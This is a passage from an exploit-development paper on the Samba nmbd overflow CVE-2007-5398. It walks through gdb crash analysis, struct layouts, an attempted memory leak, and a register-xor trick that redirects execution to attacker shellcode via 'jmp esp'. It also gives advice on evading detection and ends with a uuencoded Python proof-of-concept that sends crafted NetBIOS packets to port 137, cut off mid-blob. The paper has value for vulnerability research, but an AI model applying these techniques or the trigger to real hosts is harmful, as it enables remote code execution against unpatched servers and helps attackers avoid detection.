+#0  0x080adc67 in debug_nmb_res_rec ()
+#1  0x080ae023 in debug_nmb_packet ()
+#2  0x0806d1f8 in reply_netbios_packet ()
+#3  0x080728a5 in write_browse_list ()
+--------------------------------------------
+
+Starting our analysis at debug_nmb_packet() in libsmb/nmblib.c: 
+
+--------------------------------------------
+ 103 
+ 104 /********************************************************************
+ 105  Process a nmb packet.
+ 106 ********************************************************************/
+ 107 
+ 108 void debug_nmb_packet(struct packet_struct *p)
+ 109 {
+ 110         struct nmb_packet *nmb = &p->packet.nmb;
+ 111 
+ 112         if( DEBUGLVL( 4 ) ) {
+...
+ 131         }
+ 132 
+ 133         if (nmb->header.qdcount) {
+ 134       DEBUGADD( 4, ( "    question: q_name=%s q_type=%d q_class=%d\n",
+...
+ 138         }
+ 139 
+ 140         if (nmb->answers && nmb->header.ancount) {
+ 141                 debug_nmb_res_rec(nmb->answers,"answers");
+ 142         }
+ 143         if (nmb->nsrecs && nmb->header.nscount) {
+ 144                 debug_nmb_res_rec(nmb->nsrecs,"nsrecs");
+ 145         }
+ 146         if (nmb->additional && nmb->header.arcount) {
+ 147                 debug_nmb_res_rec(nmb->additional,"additional");
+ 148         }
+ 149 }
+
+(gdb) frame 1
+#1  0x080ae023 in debug_nmb_packet ()
+(gdb) x/8x $esp
+0xbfbfdef0:     0x00000000      0x00000000      0x4795ddfa      0x08117a40
+0xbfbfdf00:     0xbfbfe210      0x0000059a      0xbfbfe538      0x0806d1f8
+
+Let's take a guess that 0xbfbfe210 is our nmb packet:
+
+(gdb) x/x 0xbfbfe210	
+0xbfbfe210:     0x41414242
+(gdb) x/20x 0xbfbfe210
+0xbfbfe210:     0x41414242      0x42420000      0x00004141      0x41414242
+0xbfbfe220:     0x42420000      0x00004141      0x41414242      0x42420000
+0xbfbfe230:     0x00004141      0x41414242      0x42420000      0x00004141
+0xbfbfe240:     0x41414242      0x42420000      0x00004141      0x41414242
+0xbfbfe250:     0x42420000      0x00004141      0x41414242      0x42420000
+--------------------------------------------
+
+So the above analysis makes sense. We have overwritten certain data 
+structures it is looking at. Moving on, in debug_nmb_res_rec() we see: 
+
+--------------------------------------------
+  61 /*********************************************************************
+  62  Print out a res_rec structure.
+  63 *********************************************************************/
+  64 
+  65 static void debug_nmb_res_rec(struct res_rec *res, const char *hdr)
+  66 {
+  67         int i, j;
+  68 
+  69  DEBUGADD( 4, ( "    %s: nmb_name=%s rr_type=%d rr_class=%d ttl=%d\n",
+  70                 hdr,
+  71                 nmb_namestr(&res->rr_name),
+  72                 res->rr_type,
+  73                 res->rr_class,
+  74                 res->ttl ) );
+  75 
+  76         if( res->rdlength == 0 || res->rdata == NULL )
+  77                 return;
+  78 
+  79         for (i = 0; i < res->rdlength; i+= MAX_NETBIOSNAME_LEN) {
+  80                 DEBUGADD(4, ("    %s %3x char ", hdr, i));
+  81 
+  82                 for (j = 0; j < MAX_NETBIOSNAME_LEN; j++) {
+  83                         unsigned char x = res->rdata[i+j];
+  84                         if (x < 32 || x > 127)
+  85                                 x = '.';
+  86 
+  87                         if (i+j >= res->rdlength)
+  88                                 break;
+  89                         DEBUGADD(4, ("%c", x));
+  90                 }
+  91 
+  92                 DEBUGADD(4, ("   hex "));
+  93 
+  94                 for (j = 0; j < MAX_NETBIOSNAME_LEN; j++) {
+  95                         if (i+j >= res->rdlength)
+  96                                 break;
+  97                 DEBUGADD(4, ("%02X", (unsigned char)res->rdata[i+j]));
+  98                 }
+  99 
+ 100                 DEBUGADD(4, ("\n"));
+ 101         }
+ 102 }
+ 103 
+--------------------------------------------
+
+That code is not very useful at the moment. If the pointers where valid, 
+it'd work (not surprisingly).
+
+Looking at the code flow from send_packet(), (code is above), we hit some
+interesting code that we can use for an information leak.
+
+--------------------------------------------
+Starting program: /usr/local/sbin/nmbd -F -s smb.conf 
+debugging symbols found)...(no debugging symbols found)...(no debugging
+symbols found)...
+Program received signal SIGSEGV, Segmentation fault.
+0x080ada3d in put_nmb_name ()
+(gdb) bt
+#0  0x080ada3d in put_nmb_name ()
+#1  0x080ae26a in put_res_rec ()
+#2  0x080af184 in build_packet ()
+#3  0x080af236 in send_packet ()
+#4  0x0806d38a in reply_netbios_packet ()
+#5  0x080728a5 in write_browse_list ()
+Previous frame inner to this frame (corrupt stack?)
+(gdb) x/10i $eip
+0x80ada3d <put_nmb_name+49>:    repz cmpsb %es:(%edi),%ds:(%esi)
+0x80ada3f <put_nmb_name+51>:    jne    0x80adab5 <put_nmb_name+169>
+0x80ada41 <put_nmb_name+53>:    mov    0x8(%ebp),%edi
+0x80ada44 <put_nmb_name+56>:    pushl  0x50(%edi)
+0x80ada47 <put_nmb_name+59>:    push   $0x0
+0x80ada49 <put_nmb_name+61>:    pushl  0xffffffcc(%ebp)
+0x80ada4c <put_nmb_name+64>:    lea    0xffffffd8(%ebp),%eax
+0x80ada4f <put_nmb_name+67>:    push   %eax
+0x80ada50 <put_nmb_name+68>:    call   0x80ad98c <put_name>
+0x80ada55 <put_nmb_name+73>:    mov    0xffffffd4(%ebp),%edx
+(gdb) i r edi esi
+edi            0x8102db9        135278009
+esi            0x0      0
+--------------------------------------------
+
+Unfortunately, the above is crashing due to a NULL pointer dereference in
+esi when testing the contents of the name. (This piece of code is mapped to
+the check where the name is tested against '*' in put_nmb_name().)
+
+At this point of time I've decided that it is probably easier to start
+analysing the contents of reply_netbios_packet() so that I can see exactly
+what is being overwritten, where, and work out what effects it may have. 
+For this we'll use IDA Pro Standard 5.2
+
+First off, let's take a better look at what is happening in the source 
+code,  it'll help with analysis of the assembly.
+
+--------------------------------------------
+nmbd/nmbd_winsserver.c:
+ 856 /*********************************************************************
+ 857   Reply to a netbios name packet.  see rfc1002.txt
+ 858 *********************************************************************/
+ 859 
+ 860 void reply_netbios_packet(struct packet_struct *orig_packet,
+ 861          int rcode, enum netbios_reply_type_code rcv_code, int opcode,
+ 862                           int ttl, char *data,int len)
+ 863 {
+ 864         struct packet_struct packet;
+ 865         struct nmb_packet *nmb = NULL;
+ 866         struct res_rec answers;
+ 867         struct nmb_packet *orig_nmb = &orig_packet->packet.nmb;
+ 868         BOOL loopback_this_packet = False;
+ 869         int rr_type = RR_TYPE_NB;
+ 870         const char *packet_type = "unknown";
+ 871 
+ 872         /* Check if we are sending to or from ourselves. */
+ 873  if(ismyip(orig_packet->ip) && (orig_packet->port == global_nmb_port))
+ 874                 loopback_this_packet = True;
+ 875 
+ 876         nmb = &packet.packet.nmb;
+ 877 
+...
+ 965         if (data && len) {
+ 966                 nmb->answers->rdlength = len;
+ 967                 memcpy(nmb->answers->rdata, data, len);
+ 968         }
+ 969 
+...
+unfortunately, the nmb pointer is not used after line 967.
+...
+
+include/nameserv.h:
+524 
+525 struct packet_struct
+526 {
+527         struct packet_struct *next;
+528         struct packet_struct *prev;
+529         BOOL locked;
+530         struct in_addr ip;
+531         int port;
+532         int fd;
+533         time_t timestamp;
+534         enum packet_type packet_type;
+535         union {
+536                 struct nmb_packet nmb;
+537                 struct dgram_packet dgram;
+538         } packet;
+539 };
+540 
+
+..
+
+459 /* An nmb packet. */
+460 struct nmb_packet {
+461         struct {
+462                 int name_trn_id;
+463                 int opcode;
+464                 BOOL response;
+465                 struct {
+466                         BOOL bcast;
+467                         BOOL recursion_available;
+468                         BOOL recursion_desired;
+469                         BOOL trunc;
+470                         BOOL authoritative;
+471                 } nm_flags;
+472                 int rcode;
+473                 int qdcount;
+474                 int ancount;
+475                 int nscount;
+476                 int arcount;
+477         } header;
+478 
+479         struct {
+480                 struct nmb_name question_name;
+481                 int question_type;
+482                 int question_class;
+483         } question;
+484 
+485         struct res_rec *answers;
+486         struct res_rec *nsrecs;
+487         struct res_rec *additional;
+488 };
+
+...
+
+441 /* A resource record. */
+442 struct res_rec {
+443         struct nmb_name rr_name;
+444         int rr_type;
+445         int rr_class;
+446         int ttl;
+447         int rdlength;
+448         char rdata[MAX_DGRAM_SIZE];
+449 };
+450 
+
+
+...
+
+include/smb.h:
+1718 /* A netbios name structure. */
+1719 struct nmb_name {
+1720         nstring      name;
+1721         char         scope[64];
+1722         unsigned int name_type;
+1723 };
+
+...
+
+1712 #define MAX_NETBIOSNAME_LEN 16
+1713 /* DOS character, NetBIOS namestring. Type used on the wire. */
+1714 typedef char nstring[MAX_NETBIOSNAME_LEN];
+1715 /* Unix character, NetBIOS namestring. Type used to manipulate name in 
+nmbd. */ 1716 typedef char unstring[MAX_NETBIOSNAME_LEN*4];
+--------------------------------------------
+
+Looking over the struct nmb_packet, we see that it may be useful to 
+overwrite the qdcount, and set a count for either ancount, nscount, or
+adcount (which map to the pointers: answers, nsrec and additional,
+respectively). Since there are 12 bytes, we can directly control one set of
+these. Hopefully, the control of the count arguments map to direct control 
+of the same pointer, otherwise additional problems will be had.
+
+Looking at these structure layouts, one way of setting this up would be to
+analyze the stack layouts, and re-create the structures in the exploit code
+,which then gets serialized / sent across the wire. 
+
+One disadvantage of this model is that it needs additional flexibility 
+due to difference in compiler output for different versions, and 
+potentially different compiler flags / options / optimisations, as there 
+may be additional padding / ordering, and other fun things to deal.
+
+An additional problem with controlling a pointer to a "struct res_rec" is 
+that that the rdlength field has to be a sane value, otherwise it may crash 
+in memcpy, or, cause an EIP overwrite in the sendpacket() function in char
+buf[1024];. Both of these results would cause the process to crash :(. As
+this is a single shot vulnerability, causing it to potentially crash is 
+out of the question.
+
+Since we're unable to know contents of the memory we're trying to leak in
+advance, there doesn't appear to be much point continuing down this path. 
+That said, it may be possible to use certain static[] data to leak contents 
+of the .bss and heap that may be useful. 
+
+After initially being disappointed about this realisation, I realised that 
+by using known static .bss location, we could hopefully leak the rest of 
+the .bss, then, if we're lucky, the heap allocation. One side effect of 
+trying to leak the heap layout, is that it is not guaranteed to be straight 
+after the nmbd .bss. (For example, default kernel on Fedora 8 ships with 
+heap randomised and NOT after the .bss).
+
+Due to this, we would need to find a suitable pointer to the heap in the
+.bss. A suitable pointer value is:
+
+ * One that is not allocated too early in the nmbd initialisation process.
+   This requirement is because the res_rec structure size is fairly large,
+   and if it is an early allocated structure, by adjusting the pointer so 
+   that
+   rdlength points to the integer, it may hit an unmapped page.
+ * One that has a suitable small 4 byte integer value from the pointer
+   location, so that we can continue the memory leaking / analysis.
+
+Before we get too far ahead of ourselves, first we need to re-create the 
+stack layout, and see if we can overwrite some of the counts / pointers 
+correctly.
+
+After doing some analysis of how the stack is laid out, (via IDA Pro 
+Standard 5.2) we can start to adjust the exploit code to ensure it works. 
+I added the applicable structure representations in python so that I could
+set the values explicitly (for example, nmb_packet['answers'] = 0x08049000)
+, rather than having to hard code offsets / hex arrays. 
+
+Unfortunately, it appears that the stack layout for FreeBSD 6.2's Samba
+release, the ancount variable is not aligned with the 6 byte writes :( :(
+
+We can however influence the 2 most significant bytes (with least 2 
+significant bytes being flags), but reviewing the
+put_res_rec(), it kills the dream further:
+
+--------------------------------------------
+ 398         for (i=0;i<count;i++) {
+ 399                 int l = put_nmb_name(buf,offset,&recs[i].rr_name);
+ 400                 offset += l;
+ 401                 ret += l;
+ 402                 RSSVAL(buf,offset,recs[i].rr_type);
+ 403                 RSSVAL(buf,offset+2,recs[i].rr_class);
+ 404                 RSIVAL(buf,offset+4,recs[i].ttl);
+ 405                 RSSVAL(buf,offset+8,recs[i].rdlength);
+ 406                 memcpy(buf+offset+10,recs[i].rdata,recs[i].rdlength);
+ 407                 offset += 10+recs[i].rdlength;
+ 408                 ret += 10+recs[i].rdlength;
+ 409         }
+--------------------------------------------
+
+Looping at a minimum of 65536 is out of the question, as the 1024 byte
+buffer in send_packet() will quickly be overflowed, and the memcpy()
+length parameter is unknown on subsequent calls.
+
+Reviewing the flags that's available to us:
+
+--------------------------------------------
+  77 /********************************************************************
+  78 Get/Set problematic nb_flags as network byte order 16 bit int.
+  79 ********************************************************************/
+  80 
+  81 uint16 get_nb_flags(char *buf)
+  82 {
+  83         return ((((uint16)*buf)&0xFFFF) & NB_FLGMSK);
+  84 }
+  85 
+  86 void set_nb_flags(char *buf, uint16 nb_flags)
+  87 {
+  88         *buf++ = ((nb_flags & NB_FLGMSK) & 0xFF);
+  89         *buf = '\0';
+  90 }
+
+  nameserv.h:
+  89 /* Mask applied to outgoing NetBIOS flags. */
+  90 #define NB_FLGMSK 0xE0
+
+--------------------------------------------
+
+We can see we control the most significant byte of the 2-byte flag, which 
+is still highly undesirable, as the put_res_rec() code will loop at a 
+minimum of thirty two times. 
+
+Unfortunately, these restrictions prevent us from
+setting the ancount to 1. Due to the 6 byte writes, the other fields nsrec
+and additional will not be overwritten correctly. So far, it appears that
+FreeBSD 6.2 default samba package is not vulnerable to this identified 
+memory leak, which is unfortunate.
+
+After a quick analysis of the nmbd binary in Ubuntu 7.10 default install, 
+it appears the stack checking code re-ordered the buffers, and put the 
+resource record after the packet structure - this means we can't use it to 
+leak memory from nmbd :( If we could of leaked memory, there may be a 
+possibility to use that to reveal what the stack cookie is. If the stack \
+cookie was leakable, and our 6 byte writes aligned correctly, we could 
+exploit the process.
+
+--[ 5.6.2 - Back to the future^W.bss
+
+I decided to look at the crash state again, and see what we can do with 
+the 15 byte static .bss value in name_to_key()
+
+--------------------------------------------
+Starting program: /usr/local/sbin/nmbd -F -D  -s smb.conf 
+Program received signal SIGSEGV, Segmentation fault.
+0x41414242 in ?? ()
+(gdb) i r
+eax            0x1      1
+ecx            0x2834fd80       674561408
+edx            0x40     64
+ebx            0x42420000       1111621632
+esp            0xbfbfe544       0xbfbfe544
+ebp            0x5a5a0000       0x5a5a0000
+esi            0x4242   16962
+edi            0x41414242       1094795842
+eip            0x41414242       0x41414242
+eflags         0x10282  66178
+cs             0x33     51
+ss             0x3b     59
+ds             0x3b     59
+es             0x3b     59
+fs             0x3b     59
+gs             0x1b     27
+(gdb) 
+--------------------------------------------
+
+After looking at it again, we have:
+
+ * partial control of ebx (two most significant bytes)
+ * partial control of ebp (two most significant bytes)
+ * partial control of esi (two least significant bytes)
+
+After thinking about this a little more, with a bit of experimentation, we
+could use "xor [edi+offset], reg" to modify partial contents of the code
+that we could execute.
+
+Testing this theory out, we see:
+
+--------------------------------------------
+$ ndisasm -b 32 t
+00000000  315F08            xor [edi+0x8],ebx
+00000003  317708            xor [edi+0x8],esi
+00000006  316F08            xor [edi+0x8],ebp
+00000009  314708            xor [edi+0x8],eax
+0000000C  315F08            xor [edi+0x8],ebx
+0000000F  314F08            xor [edi+0x8],ecx
+00000012  315708            xor [edi+0x8],edx
+00000015  317F08            xor [edi+0x8],edi
+
+simple toupper:
+
+$ cat t | tr a-z A-Z | ndisasm -b 32 - 
+00000000  315F08            xor [edi+0x8],ebx
+00000003  315708            xor [edi+0x8],edx
+00000006  314F08            xor [edi+0x8],ecx
+00000009  314708            xor [edi+0x8],eax
+0000000C  315F08            xor [edi+0x8],ebx
+0000000F  314F08            xor [edi+0x8],ecx
+00000012  315708            xor [edi+0x8],edx
+00000015  317F08            xor [edi+0x8],edi
+--------------------------------------------
+
+From the above, we can see that we can't use esi and ebp directly in the
+xor argument, so if needed, we can push/pop around it. (This is not ideal,
+as it reduces the space left that we may be critical.)
+
+Looking quickly at this, we can do:
+--------------------------------------------
+xor [edi + <offset>], ebx 
+push ebp
+pop ebx
+xor [edi + <offset>], ebx
+sub esp, esi
+jmp esp
+--------------------------------------------
+
+The last two instructions encode to \x29\xf4\xff\xe4, so that means we need
+a byte with high bit set, that preferably expands to three bytes. (If the
+previous sentence does not make sense, re-read the section on how the 
+netbios name is converted due to charset issues). Quickly generating the 
+applicable bytes, we see that \xb0 expands to \xe2\x96\x91, and is a 
+suitable byte to use.
+
+To get what we need:
+
+--------------------------------------------
+>>> hex(0xe2 ^ 0xf4) 
+'0x16'
+>>> hex(0x96 ^ 0xff)
+'0x69'
+>>> hex(0x91 ^ 0xe4)
+'0x75'
+--------------------------------------------
+
+Putting all this together, we get: 
+
+--------------------------------------------
+Breakpoint 1, 0x08117f80 in keydata.21 ()
+(gdb) x/10i $eip
+0x8117f80 <keydata.21>: xor    %ebx,0x7(%edi)
+0x8117f83 <keydata.21+3>:       push   %ebp
+0x8117f84 <keydata.21+4>:       pop    %ebx
+0x8117f85 <keydata.21+5>:       xor    %ebx,0x9(%edi)
+0x8117f88 <keydata.21+8>:       sub    %esp,%edx
+0x8117f8a <keydata.21+10>:      xchg   %eax,%esi
+0x8117f8b <keydata.21+11>:      xchg   %eax,%ecx
+0x8117f8c <keydata.21+12>:      dec    %ecx
+...
+(gdb) stepi
+0x08117f83 in keydata.21 ()
+(gdb) x/10i $eip
+0x8117f83 <keydata.21+3>:       push   %ebp
+0x8117f84 <keydata.21+4>:       pop    %ebx
+0x8117f85 <keydata.21+5>:       xor    %ebx,0x9(%edi)
+0x8117f88 <keydata.21+8>:       sub    %esi,%esp
+0x8117f8a <keydata.21+10>:      call   *0x504e5749(%ecx)
+0x8117f90 <keydata.21+16>:      add    %al,(%eax)
+...
+(gdb) stepi
+0x08117f84 in keydata.21 ()
+(gdb) 
+0x08117f85 in keydata.21 ()
+(gdb) 
+0x08117f88 in keydata.21 ()
+(gdb) x/10i $eip
+0x8117f88 <keydata.21+8>:       sub    %esi,%esp
+0x8117f8a <keydata.21+10>:      jmp    *%esp
+...
+(gdb) i r esi
+esi            0x59e    1438
+(gdb) x/10i $esp - $esi 
+0xbfbfdfa6:     cld    
+0xbfbfdfa7:     mov    %edi,%eax
+0xbfbfdfa9:     addb   $0x0,(%eax)
+0xbfbfdfac:     mov    %edi,%esi
+0xbfbfdfae:     nop    
+0xbfbfdfaf:     addb   $0x0,(%eax)
+0xbfbfdfb2:     add    $0x3c,%esi
+0xbfbfdfb5:     addb   $0x0,(%eax)
+0xbfbfdfb8:     mov    %esp,%edi
+0xbfbfdfba:     nop    
+--------------------------------------------
+
+One problem with the above, is that the first_layer_sc.asm needs to be
+updated, as various things have changed. Such as edi pointing to the .bss
+memory location, esp pointing to where we are currently executing, etc.
+Those changes are relatively minor however.
+
+Unfortunately, due to the half eip overwrite, we still need two addresses
+to gain code execution. However, this mechanism is probably more reliable 
+than relying on stack addresses to be the same each run.
+
+--[ 5.7 - Additional exploitation notes
+
+Registrations take a parameter called ttl (time to live).. looking at the
+Samba source we see:
+
+--------------------------------------------
+static int get_ttl_from_packet(struct nmb_packet *nmb)
+{
+        int ttl = nmb->additional->ttl;
+
+        if (ttl < lp_min_wins_ttl()) {
+                ttl = lp_min_wins_ttl();
+        }
+
+        if (ttl > lp_max_wins_ttl()) {
+                ttl = lp_max_wins_ttl();
+        }
+
+        return ttl;
+}
+
+param/loadparam.c:
+FN_GLOBAL_INTEGER(lp_min_wins_ttl, &Globals.min_wins_ttl)
+Globals.min_wins_ttl = 60 * 60 * 6;     /* 6 hours default. */
+Globals.max_wins_ttl = 60 * 60 * 24 * 6;        /* 6 days default. */
+--------------------------------------------
+
+This means that by default, we have just under 6 hours to send all the
+required packets, and if we wanted, just under 6 days to exploit it. If the
+registration packets are sent at appropriate intervals, this should avoid 
+any signatures based on sending interval / query times. Another way to 
+avoid simple detection, would be to use differing netbios registration 
+flags, and avoid reasonably static ip addresses.
+
+In addition to the above time out, with a little bit more effort, it's
+possible to use the existing file descriptor, and ip address / port
+information in the packet structure passed to reply_netbios_packet(), in
+order to avoid new network connections which may be noticed / firewall'd /
+blocked in some way.
+
+With further work against known targets, the ebp register could be restored
+correctly, and execution flow could be restored to the appropriate point.
+This would provide seamless exploitation. 
+
+--[ 6 - References
+
+[1] http://us1.samba.org/samba/security/CVE-2007-5398.html
+    http://secunia.com/secunia_research/2007-90/advisory/
+[2] http://www.wireshark.org
+[3] http://oss.coresecurity.com/projects/impacket.html
+[4] http://sourceforge.net/projects/tdb/
+[5] http://www.cs.rice.edu/~scrosby/hash/
+[6] http://oss.coresecurity.com/projects/inlineegg.html
+[7] http://www.phrack.org/issues.html?issue=59&id=7
+[8] Bounds error: attempt to reference memory overrunning the end of an
+    object. Pointer value: References, size: 1 
+
+--[ 7 - Addendum 
+
+I'm honoured that this paper was even considered worthy for inclusion. 
+Thanks for the support ;)
+
+I'll be present at Ruxcon 2008, so come along and join in the fun. 
+http://www.ruxcon.org.au/ - 29th November, 2008
+
+Here is a proof of concept to trigger the issue:
+
+begin 600 CVE-2007_5398-trigger.py
+M(R$O=7-R+V)I;B]P>71H;VX@#0H-"FEM<&]R="!S=')U8W0-"FEM<&]R="!I
+M;7!A8VME="YS=')U8W1U<F4-"FEM<&]R="!I;7!A8VME="YN;6(@#0II;7!O
+M<G0@<F%N9&]M#0II;7!O<G0@<WES#0II;7!O<G0@<V]C:V5T#0II;7!O<G0@
+M=&EM90T*#0IC;&%S<R!.34)?4F5G:7-T97)?4&%C:V5T*&EM<&%C:V5T+G-T
+M<G5C='5R92Y3=')U8W1U<F4I.@T*"7-T<G5C='5R92`]("@-"@D)*"`G=')A
+M;G-A8W1I;VY?:60G+"`G(4@G("DL#0H)"2@@)V9L86=S)RP@)R%()RDL#0H)
+M"2@@)W%U97-T:6]N<R<L("<A2"<@*2P-"@D)*"`G86YS=V5R7W)R<R<L("<A
+M2"<@*2P-"@D)*"`G875T:&]R:71Y7W)R<R<L("<A2"<@*2P-"@D)*"`G861D
+M:71I;VYA;%]R<G,G+"`G(4@G*2P-"@T*"0DH("=Q=65R>5]N86UE)RP@)S,T
+M<R<I+`T*"0DH("=Q=65R>5]T>7!E)RP@)R%()R`I+`T*"0DH("=Q=65R>5]C
+M;&%S<R<L("<A2"<@*2P-"@D)#0H)"2@@)V%D9&ET:6]N86Q?;F%M92<L("<R
+M<R<@*2P-"@D)*"`G861D:71I;VYA;%]T>7!E)RP@)R%()RDL#0H)"2@@)V%D
+M9&ET:6]N86Q?8VQA<W,G+"`G(4@G("DL#0H)"2@@)W1I;65?=&]?;&EV92<L
+M("<A3"<@*2P-"@D)*"`G9&%T85]L96XG+"`G(4@G("DL#0H)"2@@)V%D9&ET
+M:6]N86Q?9FQA9W,G+"`G(4@G("DL#0H)"2@@)V%D9&ET:6]N86Q?:7!A9&1R
+M)RP@)R%,)R`I#0H)*0T*#0IC;&%S<R!.34)?5')I9V=E<E]086-K970H:6UP
+M86-K970N<W1R=6-T=7)E+E-T<G5C='5R92DZ#0H)<W1R=6-T=7)E(#T@*`T*
+M"0DH("=T<F%N<V%C=&EO;E]I9"<L("<A2"<@*2P-"@D)*"`G9FQA9W,G+"`G
+M(4@G*2P-"@D)*"`G<75E<W1I;VYS)RP@)R%()R`I+`T*"0DH("=A;G-W97)?
+M<G)S)RP@)R%()R`I+`T*"0DH("=A=71H;W)I='E?<G)S)RP@)R%()R`I+`T*
+M"0DH("=A9&1I=&EO;F%L7W)R<R<L("<A2"<I+`T*#0H)"2@@)W%U97)Y7VYA
+M;64G+"`G,S1S)RDL#0H)"2@@)W%U97)Y7W1Y<&4G+"`G(4@G("DL#0H)"2@@
+M)W%U97)Y7V-L87-S)RP@)R%()R`I+`T*"2D-"@T*8VQA<W,@0U9%7S(P,#=?
+M-3,Y.#H-"@T*"71A<F=E=',@/2!;#0H)"7L@#0H)"0DG;F%M92<Z("=$96)U
+M9V=I;F<G+`T*"0D))V1E<V-R:7!T:6]N)SH@)U1H:7,@=&%R9V5T(&%I;7,@
+M=&\@8W)A<V@@=&AE('9U;&YE<F%B;&4@<V5R=FEC92<L#0H)"0DG<F5G:7-T
+M97)?<&%C:V5T<R<Z(#$P,`T*"0E]#0H)70T*"0D-"@T*"61E9B!?7VEN:71?
+M7RAS96QF+"!H;W-T+"!T87)G970I.@T*"0EI9BAT87)G970@/"`P(&]R('1A
+M<F=E="`^(&QE;BAS96QF+G1A<F=E=',I*3H-"@D)"7)A:7-E($5X8V5P=&EO
+M;BP@)TEN=F%L:60@=&%R9V5T(&ED('-P96-I9FEE9"X@4&QE87-E('-E92`M
+M:"!F;W(@;6]R92!I;F9O<FUA=&EO;B<-"@T*"0ES96QF+FAO<W0@/2!H;W-T
+M#0H)"7-E;&8N=&%R9V5T7VED(#T@=&%R9V5T#0H-"@ED968@0W)E871E3DU"
+M4F5G:7-T97)086-K970H<V5L9BP@;F%M92P@:7`L(&9L86=S*3H-"@D)96YC
+M;V1E9%]N86UE(#T@:6UP86-K970N;FUB+F5N8V]D95]N86UE*&YA;64L(#!X
+M,6(L("(B*0T*#0H)"7!A8VME="`]($Y-0E]296=I<W1E<E]086-K970H*0T*
+M"0EP86-K971;)W1R86YS86-T:6]N7VED)UT@/2!R86YD;VTN<F%N9&EN="@P
+M+"`P>&9F9F8I#0H)"7!A8VME=%LG9FQA9W,G72`](#!X,CDP,`T*"0EP86-K
+M971;)W%U97-T:6]N<R==(#T@,0T*"0EP86-K971;)V%N<W=E<E]R<G,G72`]
+M(#`-"@D)<&%C:V5T6R=A=71H;W)I='E?<G)S)UT@/2`P#0H)"7!A8VME=%LG
+M861D:71I;VYA;%]R<G,G72`](#$-"@T*"0EP86-K971;)W%U97)Y7VYA;64G
+M72`](&5N8V]D961?;F%M90T*"0EP86-K971;)W%U97)Y7W1Y<&4G72`](#!X
+M,C`-"@D)<&%C:V5T6R=Q=65R>5]C;&%S<R==(#T@,'@P,0T*"0D-"@D)<&%C
+M:V5T6R=A9&1I=&EO;F%L7VYA;64G72`](")<>&,P7'@P8R(-"@D)<&%C:V5T
+M6R=A9&1I=&EO;F%L7W1Y<&4G72`](#!X,#`R,`T*"0EP86-K971;)V%D9&ET
+M:6]N86Q?8VQA<W,G72`](#!X,#`P,0T*"0EP86-K971;)W1I;65?=&]?;&EV
+M92==(#T@,`T*"0EP86-K971;)V1A=&%?;&5N)UT@/2`V#0H)"7!A8VME=%LG
+M861D:71I;VYA;%]F;&%G<R==(#T@9FQA9W,-"@D)<&%C:V5T6R=A9&1I=&EO
+M;F%L7VEP861D<B==(#T@:7`-"@D-"@D)<F5T=7)N('-T<BAP86-K970I#0H-
+M"@ED968@5')I9V=E<E9U;&YE<F%B:6QI='DH<V5L9BDZ#0H)"6YA;64@/2!I
+M;7!A8VME="YN;6(N96YC;V1E7VYA;64H)RHG+"`P>#%B+"`B(BD-"@T*"0DC
+M($ET(&%P<&5A<G,@:6UP86-K970N;FUB+F5N8V]D95]N86UE(&1O97,@;F]T
+M(&AA;F1L92!T:&4@86)O=F4@8V%S92!E=F5R>2!W96QL("T@<V\@=V4@96YC
+M;V1E#0H)"2,@=&AE('1Y<&4@;6%N=6%L;'D-"@T*"0EN86UE(#T@;F%M95LZ
+M,S%=("L@(EQX-#)<>#1C(B`K(&YA;65;,S,Z70T*#0H)"71R:6=G97(@/2!.
+M34)?5')I9V=E<E]086-K970H*0T*"0ET<FEG9V5R6R=T<F%N<V%C=&EO;E]I
+M9"==(#T@<F%N9&]M+G)A;F1I;G0H,"P@,'AF9F9F*0T*"0ET<FEG9V5R6R=F
+M;&%G<R==(#T@,'@P,3`P#0H)"71R:6=G97);)W%U97-T:6]N<R==(#T@,0T*
+M"0ET<FEG9V5R6R=A;G-W97)?<G)S)UT@/2`P#0H)"71R:6=G97);)V%U=&AO
+M<FET>5]R<G,G72`](#`-"@D)=')I9V=E<ELG861D:71I;VYA;%]R<G,G72`]
+M(#`-"@T*"0ET<FEG9V5R6R=Q=65R>5]N86UE)UT@/2!N86UE#0H)"71R:6=G
+M97);)W%U97)Y7W1Y<&4G72`](#!X,C`)#0H)"71R:6=G97);)W%U97)Y7V-L
+M87-S)UT@/2`P>#`Q#0H-"@D)<VMT(#T@<V5L9BY#;VYN96-T*"D-"@D)<VMT
+M+G-E;F0H<W1R*'1R:6=G97(I*0T*"0ES:W0N8VQO<V4H*0T*#0H)9&5F($UA
+M:V5.86UE*'-E;&8I.@T*"0EL971T97)S(#T@6VD@9F]R(&D@:6X@<F%N9V4H
+M;W)D*"=!)RDL(&]R9"@G6B<I*S$I70T*"0ER86YD;VTN<VAU9F9L92AL971T
+M97)S*0T*"0EN86UE(#T@<F%N9&]M+G-A;7!L92AL971T97)S+"!R86YD;VTN
+M<F%N9&EN="@R+"`Q-"DI#0H)"6YA;64@/2`G)RYJ;VEN*%MC:'(H:2D@9F]R
+M(&D@:6X@;F%M95TI#0H-"@D)<F5T=7)N(&YA;64-"@T*"61E9B!#<F5A=&50
+M86-K971S*'-E;&8I.@T*"0EP86-K971S(#T@6UT-"@D)#0H)"69O<B!I(&EN
+M(')A;F=E*'-E;&8N=&%R9V5T<UMS96QF+G1A<F=E=%]I9%U;)W)E9VES=&5R
+M7W!A8VME=',G72DZ#0H)"0DC(&EP(#T@<F%N9&]M+G)A;F1I;G0H,"P@,'AF
+M9F9F9F9F9BD-"@D)"6EP(#T@,'@V.#8Y-F$V8@T*"0D);F%M92`]('-E;&8N
+M36%K94YA;64H*0T*"0D)<&%C:V5T(#T@<V5L9BY#<F5A=&5.34)296=I<W1E
+M<E!A8VME="AN86UE+"!I<"P@,'@V,#`P*0T*"0D)<&%C:V5T<RYA<'!E;F0H
+M<&%C:V5T*0T*#0H)"7)E='5R;B!P86-K971S#0H-"@ED968@0V]N;F5C="AS
+M96QF*3H-"@D)<VMT(#T@<V]C:V5T+G-O8VME="AS;V-K970N049?24Y%5"P@
+M<V]C:V5T+E-/0TM?1$=204TL(#`I#0H)"7-K="YC;VYN96-T*"AS96QF+FAO
+M<W0L(#$S-RDI#0H)"7)E='5R;B!S:W0-"@T*"61E9B!396YD4&%C:V5T<RAS
+M96QF+"!P86-K971S*3H-"@D)<VMT(#T@<V5L9BY#;VYN96-T*"D-"@D)9F]R
+M('!A8VME="!I;B!P86-K971S.@T*"0D)<VMT+G-E;F0H<&%C:V5T*0T*"0D)
+M=&EM92YS;&5E<"@P+C$I#0H-"@D)<VMT+F-L;W-E*"D-"@T*#0H)9&5F(')U
